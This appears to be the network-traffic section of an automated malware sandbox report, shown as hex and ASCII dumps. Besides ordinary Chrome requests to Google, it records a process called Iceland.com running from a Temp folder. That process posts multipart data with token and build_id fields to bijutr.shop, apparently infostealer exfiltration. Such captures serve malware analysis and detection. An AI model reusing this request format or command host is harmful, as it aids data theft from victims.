                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC1390INData Raw: 61 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 47 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 47 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 46 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 4c 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4c 64 28 5f 2e 48 64 3f 5f 2e 48 64 2e 65 6d 70 74 79 48 54 4d 4c 3a 5c 22 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70
                                                                                                                                                                                                                                                              Data Ascii: a\"),Gd(\"http\"),Gd(\"https\"),Gd(\"mailto\"),Gd(\"ftp\"),new _.Fd(a\u003d\u003e/^[^:]*([/?#]|$)/.test(a))];_.Ld\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};_.Md\u003dnew _.Ld(_.Hd?_.Hd.emptyHTML:\"\");\n}catch(e){_._DumpExcep
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC1390INData Raw: 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 4d 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 73 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                              Data Ascii: ute(\"nonce\")||\"\"};\n_.$d\u003dfunction(a){var b\u003d_.Ma(a);return b\u003d\u003d\"array\"||b\u003d\u003d\"object\"\u0026\u0026typeof a.length\u003d\u003d\"number\"};_.ae\u003dfunction(a,b,c){return _.sb(a,b,c,!1)!\u003d\u003dvoid 0};_.be\u003dfunctio


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              10192.168.2.449754172.217.21.364433844C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:09:46 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Version: 705503573
                                                                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:47 GMT
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              11192.168.2.449764188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:09:50 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----HDTJW4E37YCBIEU37YUA
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 505
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:09:50 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 54 4a 57 34 45 33 37 59 43 42 49 45 55 33 37 59 55 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 54 4a 57 34 45 33 37 59 43 42 49 45 55 33 37 59 55 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 54 4a 57 34 45 33 37 59 43 42 49 45 55 33 37 59 55 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------HDTJW4E37YCBIEU37YUAContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------HDTJW4E37YCBIEU37YUAContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------HDTJW4E37YCBIEU37YUACont
                                                                                                                                                                                                                                                              2024-12-27 06:09:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:51 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:09:52 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              12192.168.2.449766188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:09:52 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----V3790H47GVAIE3W47YUS
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 213453
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:09:52 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 56 33 37 39 30 48 34 37 47 56 41 49 45 33 57 34 37 59 55 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 56 33 37 39 30 48 34 37 47 56 41 49 45 33 57 34 37 59 55 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 56 33 37 39 30 48 34 37 47 56 41 49 45 33 57 34 37 59 55 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------V3790H47GVAIE3W47YUSContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------V3790H47GVAIE3W47YUSContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------V3790H47GVAIE3W47YUSCont
                                                                                                                                                                                                                                                              2024-12-27 06:09:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:09:52 UTC16355OUTData Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44
                                                                                                                                                                                                                                                              Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
                                                                                                                                                                                                                                                              2024-12-27 06:09:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:09:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:09:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:09:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:09:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:09:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:09:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:09:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:54 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              13192.168.2.449767188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:09:54 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----VAIM7GLFCBIE3EUS00HL
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 55081
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:09:54 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 56 41 49 4d 37 47 4c 46 43 42 49 45 33 45 55 53 30 30 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 56 41 49 4d 37 47 4c 46 43 42 49 45 33 45 55 53 30 30 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 56 41 49 4d 37 47 4c 46 43 42 49 45 33 45 55 53 30 30 48 4c 0d 0a 43 6f 6e 74
